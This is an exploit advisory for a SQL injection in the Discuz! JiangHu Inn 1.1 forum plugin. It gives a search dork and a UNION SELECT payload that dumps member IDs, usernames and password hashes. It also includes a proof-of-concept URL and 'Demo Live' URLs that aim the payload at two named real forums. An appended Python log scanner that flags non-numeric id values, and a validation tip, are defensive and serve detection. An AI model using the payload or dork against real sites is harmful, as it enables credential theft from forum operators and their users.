Discuz! Plugin JiangHu 1.1 - 'id' SQL Injection



EKU-ID: 17341
CVE: OSVDB-61855; CVE-2009-4621
Author: ZhaoHuAn
Published: 2009-09-02
Verified: Verified


=========================================================
Discuz! Plugin JiangHu <= 1.1 SQL Injection Vulnerability
=========================================================

========================[Author]=========================

 [+] Found by	: ZhaoHuAn
 [+] Contact	: ZhengXing[at]shandagames[dot]com
 [+] Blog	: http://www.patching.net/zhaohuan/
 [+] Date	: Feb, 9th 2009
 [+] Update	: Sep, 1st 2009

========================[Soft Info]======================

Software: Discuz! Plugin JiangHu Inn
Version	: 1.1
Vendor	: http://www.discuz.com
d0rk    : inurl:forummission.php



[-] Exploit:
[+] and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[-] SqlI PoC:
[+] http://target/[path]/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[+] Demo Live:
[-] http://www.palslp.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[-] http://bbs.sunspals.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--
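
[*] Detection (added example, not part of the original advisory or of Discuz!): a log check that flags requests to forummission.php whose id parameter is not a plain integer, which is the shape of the PoC above. The combined log format, the sample entries and the assumption that a legitimate id is always numeric (the advisory only shows id=24) are assumptions of this example.

```python
import re
from urllib.parse import parse_qs

# Request line of a combined-format access log entry (spaces in the URL tolerated).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>.+?) HTTP/\d(?:\.\d)?"')
SQL_WORDS = re.compile(r"\b(union|select|group_concat|from)\b", re.I)

# Constructed sample entries; client addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Sep/2009:10:00:01 +0000] "GET /forummission.php?index=show&id=24 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [02/Sep/2009:10:00:09 +0000] "GET /bbs/forummission.php?index=show&id=24%20and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11%20from%20cdb_members-- HTTP/1.1" 200 6210',
    '192.0.2.11 - - [02/Sep/2009:10:00:15 +0000] "GET /index.php?id=abc HTTP/1.1" 200 100',
]


def check_line(line):
    """Return a finding dict if the entry carries a non-numeric id for forummission.php."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    if not path.lower().endswith("/forummission.php"):
        return None
    # parse_qs decodes %xx and turns '+' into a space, as the server would.
    for value in parse_qs(query).get("id", []):
        # Assumption: a legitimate id is digits only, so anything else is reported.
        if not re.fullmatch(r"[0-9]+", value):
            words = sorted({w.lower() for w in SQL_WORDS.findall(value)})
            return {"client": line.split()[0], "id": value, "sql_words": words}
    return None


def scan(lines):
    """Return the findings for every suspicious entry, in log order."""
    return [f for f in map(check_line, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same digits-only rule, applied to id on the server before it reaches the query, rejects the PoC string.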


/---------------------------------------------www.zhaohuan.net-------------------------------------------------\

                                            Greetz : Snda Security Team
                                                    & Normal is boring - -!

\--------------------------------------------------------------------------------------------------------------/

# milw0rm.com [2009-09-02]